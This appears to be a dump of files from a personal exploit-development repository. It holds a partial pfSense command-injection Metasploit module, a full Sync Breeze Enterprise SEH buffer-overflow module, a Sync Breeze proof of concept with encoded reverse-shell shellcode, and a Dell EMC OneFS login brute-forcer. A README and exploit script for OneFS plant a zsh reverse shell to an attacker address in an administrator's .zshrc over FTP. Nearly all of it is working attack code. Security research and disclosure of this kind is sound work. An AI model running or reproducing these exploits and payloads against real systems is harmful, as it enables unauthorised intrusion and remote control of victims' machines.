Ugly code 135 | # don't look 136 | complete_stage = "" 137 | for i in 0..(stager.length()-1) 138 | if version.to_s =~ /2.2/ 139 | complete_stage << '\\' 140 | end 141 | complete_stage << "\\#{stager[i].ord.to_s(8)}" 142 | end 143 | 144 | res = send_request_cgi( 145 | 'uri' => '/status_rrd_graph_img.php', 146 | 'method' => 'GET', 147 | 'cookie' => cookie, 148 | 'vars_get' => { 149 | 'database' => '-throughput.rrd', 150 | 'graph' => "file|printf '#{complete_stage}'|sh|echo", 151 | } 152 | ) 153 | 154 | if res && res.code == 200 155 | print_status('Payload uploaded successfully, executing') 156 | register_file_for_cleanup(filename) 157 | else 158 | print_error('Failed to upload payload...') 159 | end 160 | 161 | res = send_request_cgi({ 162 | 'uri' => '/status_rrd_graph_img.php', 163 | 'method' => 'GET', 164 | 'cookie' => cookie, 165 | 'vars_get' => { 166 | 'database' => '-throughput.rrd', 167 | 'graph' => "file|php #{filename}|echo " 168 | } 169 | }) 170 | disconnect 171 | end 172 | end 173 | end 174 | -------------------------------------------------------------------------------- /Metasploit-Modules/syncbreeze_bof.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = GreatRanking 8 | 9 | include Msf::Exploit::Remote::Seh 10 | include Msf::Exploit::Remote::Egghunter 11 | include Msf::Exploit::Remote::HttpClient 12 | 13 | def initialize(info = {}) 14 | super(update_info(info, 15 | 'Name' => 'Sync Breeze Enterprise GET Buffer Overflow', 16 | 'Description' => %q{ 17 | This module exploits a stack-based buffer overflow vulnerability 18 | in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28, 19 | and v10.1.16, caused by improper bounds checking of the request in 20 | HTTP GET and POST requests sent to the built-in web server. This 21 | module has been tested successfully on Windows 7 SP1 x86. 22 | }, 23 | 'License' => MSF_LICENSE, 24 | 'Author' => 25 | [ 26 | 'Daniel Teixeira', 27 | 'Andrew Smith', # MSF support for v10.0.28 28 | 'Owais Mehtab', # Original v10.0.28 exploit 29 | 'Milton Valencia (wetw0rk)' # MSF support for v10.1.16 30 | ], 31 | 'DefaultOptions' => 32 | { 33 | 'EXITFUNC' => 'thread' 34 | }, 35 | 'Platform' => 'win', 36 | 'Payload' => 37 | { 38 | 'BadChars' => "\x00\x09\x0a\x0d\x20\x26", 39 | 'Space' => 500 40 | }, 41 | 'Targets' => 42 | [ 43 | [ 44 | 'Automatic', {} 45 | ], 46 | [ 'Sync Breeze Enterprise v9.4.28', 47 | { 48 | 'Offset' => 2488, 49 | 'Ret' => 0x10015fde # POP # POP # RET [libspp.dll] 50 | } 51 | ], 52 | [ 'Sync Breeze Enterprise v10.0.28', 53 | { 54 | 'Offset' => 780, 55 | 'Ret' => 0x10090c83 # JMP ESP [libspp.dll] 56 | } 57 | ], 58 | [ 'Sync Breeze Enterprise v10.1.16', 59 | { 60 | 'Offset' => 2495, 61 | 'Ret' => 0x1001C65C # POP # POP # RET [libspp.dll] 62 | } 63 | ] 64 | ], 65 | 'Privileged' => true, 66 | 'DisclosureDate' => 'Mar 15 2017', 67 | 'DefaultTarget' => 0)) 68 | end 69 | 70 | def get_product_name 71 | res = send_request_cgi( 72 | 'method' => 'GET', 73 | 'uri' => '/' 74 | ) 75 | 76 | if res && res.code == 200 77 | product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first 78 | return product_name if product_name 79 | end 80 | 81 | nil 82 | end 83 | 84 | def check 85 | product_name = get_product_name 86 | return Exploit::CheckCode::Unknown unless product_name 87 | 88 | if product_name =~ /9\.4\.28/ || product_name =~ /10\.0\.28/ 89 | return Exploit::CheckCode::Appears 90 | elsif product_name =~ /Sync Breeze Enterprise/ 91 | return Exploit::CheckCode::Detected 92 | end 93 | 94 | Exploit::CheckCode::Safe 95 | end 96 | 97 | def get_target_name 98 | if target.name != 'Automatic' 99 | print_status("Target manually set as #{target.name}") 100 | return target 101 | else 102 | print_status('Automatically detecting target...') 103 | end 104 | 105 | case get_product_name 106 | when /9\.4\.28/ 107 | print_status('Target is 9.4.28') 108 | return targets[1] 109 | when /10\.0\.28/ 110 | print_status('Target is 10.0.28') 111 | return targets[2] 112 | when /10\.1\.16/ 113 | print_status('Target is 10.1.16') 114 | return targets[3] 115 | else 116 | nil 117 | end 118 | end 119 | 120 | def exploit 121 | tmp_target = target 122 | case get_target_name 123 | when targets[1] 124 | target = targets[1] 125 | eggoptions = { 126 | checksum: true, 127 | eggtag: rand_text_alpha(4, payload_badchars) 128 | } 129 | 130 | hunter, egg = generate_egghunter( 131 | payload.encoded, 132 | payload_badchars, 133 | eggoptions 134 | ) 135 | 136 | sploit = rand_text_alpha(target['Offset']) 137 | sploit << generate_seh_record(target.ret) 138 | sploit << hunter 139 | sploit << make_nops(10) 140 | sploit << egg 141 | sploit << rand_text_alpha(5500) 142 | 143 | print_status('Sending request...') 144 | 145 | send_request_cgi( 146 | 'method' => 'GET', 147 | 'uri' => sploit 148 | ) 149 | 150 | when targets[2] 151 | target = targets[2] 152 | uri = "/login" 153 | sploit = rand_text_alpha(target['Offset']) 154 | sploit << [target.ret].pack('V') 155 | sploit << rand_text(4) 156 | make_nops(10) 157 | sploit << payload.encoded 158 | 159 | print_status('Sending request...') 160 | 161 | send_request_cgi( 162 | 'method' => 'POST', 163 | 'uri' => uri, 164 | 'vars_post' => { 165 | 'username' => "#{sploit}", 166 | 'password' => "rawr" 167 | } 168 | ) 169 | when targets[3] 170 | target = targets[3] 171 | 172 | eggoptions = { 173 | checksum: true, 174 | eggtag: rand_text_alpha(4, payload_badchars) 175 | } 176 | 177 | hunter, egg = generate_egghunter( 178 | payload.encoded, 179 | payload_badchars, 180 | eggoptions 181 | ) 182 | 183 | sploit = payload.encoded 184 | sploit << rand_text_alpha(target['Offset'] - payload.encoded.length, payload_badchars) 185 | sploit << generate_seh_record(target.ret) 186 | sploit << hunter 187 | # Push the payload out of this buffer, which will make the hunter look for the payload 188 | # somewhere else that has the complete payload. 189 | sploit << make_nops(200) 190 | sploit << egg 191 | sploit << rand_text_alpha(9067 - sploit.length, payload_badchars) 192 | 193 | send_request_cgi( 194 | 'uri' => "/#{sploit}", 195 | 'method' => 'GET' 196 | ) 197 | else 198 | print_error("Exploit not suitable for this target.") 199 | end 200 | ensure 201 | target = tmp_target 202 | end 203 | end 204 | -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/README.md: -------------------------------------------------------------------------------- 1 | # OneFS Storage Administration (DELL EMC Isilon) 2 | 3 | ## Bruteforcing The Console? 4 | 5 | We should be able to bruteforce the console by using my custom script [isilon-onefs-brute.py](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/DELL%20EMC%20OneFS%20Storage%20Administration%208.1.2.0%20-%20Authenticated%20RCE/isilon-onefs-brute.py) (tested on 8.1.2.0). I have tested 1379 invalid passwords with one valid at the end and got a valid response... this means there is no timeouts in place at least for the defualt install. 6 | 7 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/DELL%20EMC%20OneFS%20Storage%20Administration%208.1.2.0%20-%20Authenticated%20RCE/images/bruteforce.png) 8 | 9 | ## Exploitation Via FTP 10 | 11 | When looking for exploits on exploit-db I found a submission from [Core Security](https://www.exploit-db.com/exploits/44039/) showing multiple vulnerabilities such as enabling SSH via CSRF. An issue we likely will face is that SSH is disabled or rather filtered on these hosts. So even if we enable SSH we will be unable to authenticate due to possible IP table rules. So I began looking for ways to get a shell without enabling SSH. 12 | 13 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/DELL%20EMC%20OneFS%20Storage%20Administration%208.1.2.0%20-%20Authenticated%20RCE/images/fssh.png) 14 | 15 | ### Enabling FTP 16 | 17 | Once authenticated we can enable FTP by going to `Protocols` -> `FTP Settings` -> checking off `Enable FTP service, Enable server-to-server transfers` and save the changes. Now from here exploitation is straight forward. 18 | 19 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/DELL%20EMC%20OneFS%20Storage%20Administration%208.1.2.0%20-%20Authenticated%20RCE/images/ftp-settings.png) 20 | 21 | ### Exploitation 22 | 23 | With FTP enabled we can simply login using the same credentials used for the console. Logged in we can see our current directory is the administrators home directory giving us access to `.zshrc`. 24 | 25 | ``` 26 | ftp> pwd 27 | 257 "/ifs/home/admin" 28 | ftp> ls -la 29 | 200 PORT command successful. Consider using PASV. 30 | 150 Here comes the directory listing. 31 | drwxr-xr-x 2 ftp ftp 16 Sep 20 08:11 . 32 | drwxrwxr-x 4 ftp ftp 28 Sep 20 08:11 .. 33 | -rw-r--r-- 1 ftp ftp 659 Sep 20 08:11 .zshrc 34 | 226 Directory send OK. 35 | ftp> get .zshrc 36 | local: .zshrc remote: .zshrc 37 | 200 PORT command successful. Consider using PASV. 38 | 150 Opening BINARY mode data connection for .zshrc (659 bytes). 39 | 226 Transfer complete. 40 | 659 bytes received in 0.00 secs (1.7654 MB/s) 41 | ftp> bye 42 | 221 Goodbye. 43 | ``` 44 | 45 | Once downloaded we can simple append a reverse shell onto the `.zsrc` file. 46 | 47 | ``` 48 | root@kali:~# echo -ne "\n" >> .zshrc 49 | root@kali:~# msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw >> .zshrc 50 | No encoder or badchars specified, outputting raw payload 51 | Payload size: 93 bytes 52 | 53 | root@kali:~# echo -ne " &\n" >> .zshrc 54 | ``` 55 | 56 | Then we re-upload the new `.zshrc`. Be sure to backup the original. 57 | 58 | ``` 59 | ftp> rename .zshrc .backup 60 | 350 Ready for RNTO. 61 | 250 Rename successful. 62 | ftp> put .zshrc 63 | local: .zshrc remote: .zshrc 64 | 200 PORT command successful. Consider using PASV. 65 | 150 Ok to send data. 66 | 226 Transfer complete. 67 | 756 bytes sent in 0.00 secs (15.3400 MB/s) 68 | ftp> bye 69 | 221 Goodbye. 70 | ``` 71 | 72 | Having a handler setup you now wait until the administrator logs in through SSH and we get a shell! 73 | 74 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/DELL%20EMC%20OneFS%20Storage%20Administration%208.1.2.0%20-%20Authenticated%20RCE/images/logged-in-shell.png) 75 | 76 | This is what the administrator will see on his end. 77 | 78 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/DELL%20EMC%20OneFS%20Storage%20Administration%208.1.2.0%20-%20Authenticated%20RCE/images/admin-side.png) 79 | -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/admin-side.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/admin-side.png -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/bruteforce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/bruteforce.png -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/fssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/fssh.png -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/ftp-settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/ftp-settings.png -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/logged-in-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/images/logged-in-shell.png -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/isilon-onefs-brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Script name : isilon-onefs-brute.py 4 | # Version : 1.0 5 | # Created date : 9/19/18 6 | # Last update : 9/19/18 7 | # Author : Milton Valencia (wetw0rk) 8 | # Python version : 3.5 9 | # Designed OS : Linux (preferably a penetration testing distro) 10 | # 11 | # Description : 12 | # This script will attempt to bruteforce DELL EMC Isilon 13 | # aka OneFS Storage Administration. 14 | # 15 | 16 | import sys 17 | import time 18 | import requests 19 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | 22 | def login_attempt(target_url, user, passwd): 23 | cookies = \ 24 | { 25 | 'isicsrf': 'wetw0rk', 26 | 'flash' : '1', 27 | } 28 | 29 | headers = \ 30 | { 31 | 'Host' : '%s:%s' % (target_url.split(":")[1].lstrip('//'), target_url.split(":")[2]), 32 | 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0', 33 | 'Accept' : '*/*', 34 | 'Accept-Language' : 'en-US,en;q=0.5', 35 | 'Accept-Encoding' : 'gzip, deflate', 36 | 'Referer' : '%s/' % (target_url), 37 | 'Content-Type' : 'application/json', 38 | 'X-Requested-With' : 'XMLHttpRequest', 39 | 'Content-Length' : '97', 40 | 'Connection' : 'close', 41 | } 42 | 43 | params = \ 44 | ( 45 | ('_dc', 'plomo_no_opcion_de_plata'), 46 | ) 47 | 48 | data = '{"username":"%s","password":"%s","services":["platform","namespace","WK","remote-service"]}' % (user, passwd) 49 | 50 | s = requests.Session() 51 | response = s.post( # requests.post( 52 | '%s/session/1/session' % (target_url), 53 | headers=headers, 54 | params=params, 55 | cookies=cookies, 56 | data=data, 57 | verify=False 58 | ) 59 | 60 | return response 61 | 62 | def read_dictionary(filename): 63 | password_attempts = [] 64 | wordlist = open(filename) 65 | words = wordlist.readlines() 66 | 67 | for i in words: 68 | password_attempts += i.rstrip(), 69 | 70 | return password_attempts 71 | 72 | def main(): 73 | 74 | try: 75 | rhost = str(sys.argv[1]) 76 | user = sys.argv[2] 77 | passl = sys.argv[3] 78 | except: 79 | print("Usage: ./%s " % sys.argv[0]) 80 | print("Example: ./%s https://192.168.245.3:8080 admin dic.txt" % sys.argv[0]) 81 | sys.exit(1) 82 | 83 | try: 84 | attempts = read_dictionary(passl) 85 | except: 86 | print("\033[1m\033[91m[-]\033[0m error reading file") 87 | exit(-1) 88 | 89 | for i in range(len(attempts)): 90 | get_login_resp = login_attempt(rhost, user, attempts[i]) 91 | if get_login_resp.text == '{"message":"Username or password is incorrect."}\n': 92 | print("\033[1m\033[91m[-]\033[0m login %s:%s failed" % (user, attempts[i])) 93 | else: 94 | print("\033[1m\033[92m[+]\033[0m login %s:%s successful" % (user, attempts[i])) 95 | sys.exit(0) 96 | main() 97 | -------------------------------------------------------------------------------- /Personal-Exploits/DELL EMC OneFS Storage Administration 8.1.2.0 - Authenticated RCE/isilon-onefs-ftp-exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Exploit name : isilon-onefs-ftp-exploit.py 4 | # Created date : 9/21/18 5 | # Submit Date : 10/10/18 6 | # Author : wetw0rk 7 | # Header Wizard BOI : loganbest 8 | # Python version : 2.7 9 | # Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py 10 | # Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 11 | # Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip 12 | # Tested on : DELL EMC OneFS Storage Administration 8.1.2.0 13 | # 14 | # Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil 15 | # 16 | # [------------ Timeline ------------] 17 | # 9/21/18 - Contacted Dell PSIRT 18 | # 9/25/18 - Sent POC code 19 | # 10/9/18 - Responded with "not considered a vulnerability" 20 | # 21 | # Description : 22 | # To exploit this vulnerability first you must gain access to the administrative 23 | # interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable 24 | # FTP like so: 25 | # -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit! 26 | # 27 | # Since you're dropped in the user home directory and not a secluded FTP directory 28 | # you can inject into .zshrc, however as dell stated you can access other files on 29 | # the system as well.... 30 | # 31 | 32 | import os 33 | import sys 34 | import socket 35 | import threading 36 | 37 | RED = "\033[1m\033[31m[-]\033[0m" 38 | BLUE = "\033[1m\033[94m[*]\033[0m" 39 | GREEN = "\033[1m\033[92m[+]\033[0m" 40 | 41 | def background_server(lhost): 42 | global check 43 | 44 | fd = open(".zshrc", 'w') 45 | 46 | host = "0.0.0.0" 47 | port = 50121 48 | sock = socket.socket( 49 | socket.AF_INET, 50 | socket.SOCK_STREAM 51 | ) 52 | sock.bind((host, port)) 53 | sock.listen(5) 54 | 55 | print("%s listening on %s:%s" % (BLUE, host,port)) 56 | while True: 57 | conn, addr = sock.accept() 58 | if check != 1: 59 | zshrc_file = conn.recv(4096) 60 | print("%s generating .zshrc payload" % BLUE) 61 | fd.write(zshrc_file) 62 | # msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw 63 | fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost) 64 | fd.close() 65 | else: 66 | with open('.zshrc', 'r') as myfile: 67 | data=myfile.read() 68 | conn.send(data) 69 | 70 | try: 71 | rhost = sys.argv[1] 72 | rport = int(sys.argv[2]) 73 | lhost = sys.argv[3] 74 | username = sys.argv[4] 75 | password = sys.argv[5] 76 | except: 77 | print("Usage: ./%s " % sys.argv[0]) 78 | print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0]) 79 | exit(0) 80 | 81 | check = 0 # start a background server for download+uploads 82 | server_thread = threading.Thread(target=background_server, args=(lhost,)) 83 | server_thread.start() 84 | 85 | # create a socket for the client sending the commands 86 | print("%s connecting to %s:%s" % (BLUE, rhost, rport)) 87 | csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 88 | csock.connect((rhost, rport)) 89 | csock.recv(4096) 90 | print("%s performing login to OneFS using %s:%s" % (BLUE, username, password)) 91 | csock.send("USER %s\r\n" % username) 92 | csock.recv(4096) 93 | csock.send("PASS %s\r\n" % password) 94 | csock.recv(4096) 95 | print("%s login was successful downloading .zshrc" % GREEN) 96 | csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121 97 | csock.recv(4096) 98 | csock.send("RETR .zshrc\r\n") 99 | csock.recv(4096) 100 | csock.send("RNFR .zshrc\r\n") 101 | csock.recv(4096) 102 | print("%s renaming remote .zshrc to .backup" % GREEN) 103 | csock.send("RNTO .backup\r\n") 104 | csock.recv(4096) 105 | check = 1 106 | print("%s uploading payload to target host" % GREEN) 107 | csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121 108 | csock.recv(4096) 109 | csock.send("TYPE I\r\n") 110 | csock.recv(4096) 111 | csock.send("STOR .zshrc\r\n") 112 | print("%s exploitation complete waiting for %s to login" % (GREEN, username)) 113 | os.system("nc -lvp 443") 114 | csock.close() 115 | -------------------------------------------------------------------------------- /Personal-Exploits/README.md: -------------------------------------------------------------------------------- 1 | # Personal Exploits 2 | 3 | This directory contains the following PoC or Exploit code. 4 | 5 | | Exploit | Bug | CVE | 6 | | --- | --- | --- | 7 | | DELL EMC OneFS Storage Administration 8.1.2.0 | .zshrc injection | N/A | 8 | | Nimsoft nimcontroller 7.80 | Out of bounds Read/Write | CVE-2020-8012 | 9 | | SyncBreeze Enterprise v10.1.16 | Buffer Overflow | CVE-2017-17099 | 10 | | Sysdig Monitor | Information Leakage | N/A | 11 | | VXSearch v10.2.14 | Buffer Overflow | N/A | 12 | -------------------------------------------------------------------------------- /Personal-Exploits/SyncBreeze Enterprise v10.1.16 - Unauthenticated RCE/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | There exists an unauthenticated SEH based Buffer Overflow vulnerability in the HTTP server of Flexense SyncBreeze Enterprise v10.1.16. When sending a GET request with an excessive length, it is possible for a malicious user to overwrite the SEH record and execute a payload that would run under the Windows SYSTEM account. 4 | 5 | ## Exploitation Example 6 | 7 | ![alt text](https://github.com/wetw0rk/Exploit-Development/blob/master/Personal-Exploits/SyncBreeze%20Enterprise%20v10.1.16%20-%20Unauthenticated%20RCE/images/w00t.png) 8 | -------------------------------------------------------------------------------- /Personal-Exploits/SyncBreeze Enterprise v10.1.16 - Unauthenticated RCE/images/w00t.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wetw0rk/Exploit-Development/cf3d587e537c594413efa98bcd4ac20154874cf6/Personal-Exploits/SyncBreeze Enterprise v10.1.16 - Unauthenticated RCE/images/w00t.png -------------------------------------------------------------------------------- /Personal-Exploits/SyncBreeze Enterprise v10.1.16 - Unauthenticated RCE/sploit-PoC.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Exploit Title : Sync Breeze Enterprise v10.1.16 0day 4 | # Date : 10/11/2017 5 | # Vendor HomePage : http://www.syncbreeze.com 6 | # Exploit Author : Milton Valencia (wetw0rk) 7 | # Software : http://www.syncbreeze.com/downloads.html 8 | # Version : 10.1.16 9 | # Tested on : Windows 7 (x86) 10 | # 11 | # Description : Sync Breeze Enterprise 10.1.16 suffers from a SEH based 12 | # vulnerability. Successful exploitation results in remote 13 | # access. 14 | # 15 | # Special Greetz : Corelan, Offsec, Abatchy (top llama), Seamus, N4ss4r 16 | # Ryan, Miguel (best boss..), everyone at https://netsecfocus.slack.com/ 17 | # 18 | 19 | import sys, socket, struct 20 | 21 | try: 22 | host = sys.argv[1] 23 | port = int(sys.argv[2]) 24 | 25 | except IndexError: 26 | 27 | print "Usage: %s " % sys.argv[0] 28 | print "Example: %s 192.168.0.16 80" % sys.argv[0] 29 | sys.exit(0) 30 | 31 | print "[->] Attacking %s:%d get that handler up" % (host,port) 32 | 33 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.16 LPORT=443 34 | # -e x86/alpha_upper -b "\x00\x0a\x0d" -f c 35 | shellcode = ( 36 | "\x89\xe3\xda\xdf\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" 37 | "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" 38 | "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" 39 | "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" 40 | "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x42\x33\x30" 41 | "\x35\x50\x53\x30\x33\x50\x4b\x39\x4a\x45\x46\x51\x39\x50\x35" 42 | "\x34\x4c\x4b\x30\x50\x46\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b" 43 | "\x36\x32\x42\x34\x4c\x4b\x53\x42\x46\x48\x54\x4f\x4e\x57\x30" 44 | "\x4a\x56\x46\x56\x51\x4b\x4f\x4e\x4c\x37\x4c\x55\x31\x43\x4c" 45 | "\x34\x42\x36\x4c\x47\x50\x59\x51\x58\x4f\x44\x4d\x43\x31\x38" 46 | "\x47\x4d\x32\x5a\x52\x50\x52\x46\x37\x4c\x4b\x30\x52\x42\x30" 47 | "\x4c\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x54\x51\x54\x38\x4b" 48 | "\x53\x30\x48\x55\x51\x38\x51\x50\x51\x4c\x4b\x51\x49\x37\x50" 49 | "\x35\x51\x59\x43\x4c\x4b\x50\x49\x54\x58\x4b\x53\x57\x4a\x30" 50 | "\x49\x4c\x4b\x46\x54\x4c\x4b\x53\x31\x59\x46\x50\x31\x4b\x4f" 51 | "\x4e\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x38\x47\x57\x48\x4b" 52 | "\x50\x53\x45\x5a\x56\x43\x33\x53\x4d\x4c\x38\x47\x4b\x43\x4d" 53 | "\x46\x44\x53\x45\x4a\x44\x36\x38\x4c\x4b\x31\x48\x46\x44\x35" 54 | "\x51\x4e\x33\x52\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58" 55 | "\x45\x4c\x33\x31\x48\x53\x4c\x4b\x44\x44\x4c\x4b\x43\x31\x58" 56 | "\x50\x4c\x49\x50\x44\x36\x44\x36\x44\x51\x4b\x51\x4b\x35\x31" 57 | "\x31\x49\x31\x4a\x36\x31\x4b\x4f\x4d\x30\x31\x4f\x51\x4f\x31" 58 | "\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x4d\x31\x4d\x32\x48\x46\x53" 59 | "\x50\x32\x53\x30\x35\x50\x33\x58\x34\x37\x34\x33\x30\x32\x31" 60 | "\x4f\x56\x34\x53\x58\x50\x4c\x33\x47\x46\x46\x45\x57\x4b\x4f" 61 | "\x39\x45\x38\x38\x5a\x30\x35\x51\x45\x50\x35\x50\x36\x49\x49" 62 | "\x54\x46\x34\x46\x30\x35\x38\x37\x59\x4d\x50\x42\x4b\x33\x30" 63 | "\x4b\x4f\x59\x45\x56\x30\x56\x30\x30\x50\x36\x30\x47\x30\x36" 64 | "\x30\x57\x30\x46\x30\x42\x48\x5a\x4a\x44\x4f\x39\x4f\x4d\x30" 65 | "\x4b\x4f\x4e\x35\x5a\x37\x43\x5a\x44\x45\x32\x48\x39\x50\x4f" 66 | "\x58\x45\x50\x42\x30\x32\x48\x43\x32\x43\x30\x45\x51\x4f\x4b" 67 | "\x4d\x59\x4a\x46\x43\x5a\x32\x30\x31\x46\x51\x47\x43\x58\x4d" 68 | "\x49\x4e\x45\x54\x34\x33\x51\x4b\x4f\x48\x55\x4d\x55\x49\x50" 69 | "\x54\x34\x34\x4c\x4b\x4f\x50\x4e\x55\x58\x43\x45\x4a\x4c\x33" 70 | "\x58\x4c\x30\x38\x35\x4e\x42\x31\x46\x4b\x4f\x49\x45\x43\x58" 71 | "\x55\x33\x52\x4d\x33\x54\x35\x50\x4d\x59\x5a\x43\x46\x37\x30" 72 | "\x57\x51\x47\x50\x31\x5a\x56\x32\x4a\x52\x32\x51\x49\x36\x36" 73 | "\x4d\x32\x4b\x4d\x52\x46\x4f\x37\x51\x54\x31\x34\x37\x4c\x33" 74 | "\x31\x55\x51\x4c\x4d\x50\x44\x31\x34\x42\x30\x58\x46\x33\x30" 75 | "\x47\x34\x31\x44\x46\x30\x31\x46\x56\x36\x46\x36\x51\x56\x46" 76 | "\x36\x50\x4e\x50\x56\x56\x36\x31\x43\x30\x56\x53\x58\x32\x59" 77 | "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x4e\x35\x4c\x49\x4b\x50\x30" 78 | "\x4e\x46\x36\x50\x46\x4b\x4f\x36\x50\x42\x48\x53\x38\x4b\x37" 79 | "\x35\x4d\x45\x30\x4b\x4f\x59\x45\x4f\x4b\x4c\x30\x38\x35\x4f" 80 | "\x52\x56\x36\x33\x58\x4f\x56\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f" 81 | "\x48\x55\x57\x4c\x34\x46\x33\x4c\x34\x4a\x4d\x50\x4b\x4b\x4d" 82 | "\x30\x44\x35\x33\x35\x4f\x4b\x51\x57\x34\x53\x42\x52\x42\x4f" 83 | "\x53\x5a\x35\x50\x46\x33\x4b\x4f\x48\x55\x41\x41" 84 | ) 85 | 86 | # objdump2shellcode -d shellcode -f python -c -v jumpcode 87 | jumpcode = "" 88 | jumpcode += "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a 89 | jumpcode += "\x25\x35\x32\x31\x2a" # and eax,0x2a313235 90 | jumpcode += "\x2d\x37\x37\x37\x37" # sub eax,0x37373737 91 | jumpcode += "\x2d\x74\x74\x74\x74" # sub eax,0x74747474 92 | jumpcode += "\x2d\x55\x54\x55\x70" # sub eax,0x70555455 93 | jumpcode += "\x50" # push eax 94 | jumpcode += "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a 95 | jumpcode += "\x25\x35\x32\x31\x2a" # and eax,0x2a313235 96 | jumpcode += "\x2d\x2d\x76\x7a\x63" # sub eax,0x637a762d 97 | jumpcode += "\x2d\x2d\x76\x7a\x30" # sub eax,0x307a762d 98 | jumpcode += "\x2d\x25\x50\x7a\x30" # sub eax,0x307a5025 99 | jumpcode += "\x50" # push eax 100 | jumpcode += "\xff\xe4" # jmp esp 101 | 102 | offset = "A" * (2495-len(shellcode)) # offset to nSEH 103 | nSEH = "\x74\x06\x75\x06" # JE/JNZ -> jumpcode 104 | SEH = struct.pack('] sending poisonous bamboo" 117 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 118 | sock.connect((host, port)) 119 | sock.send(vulnREQ) 120 | 121 | 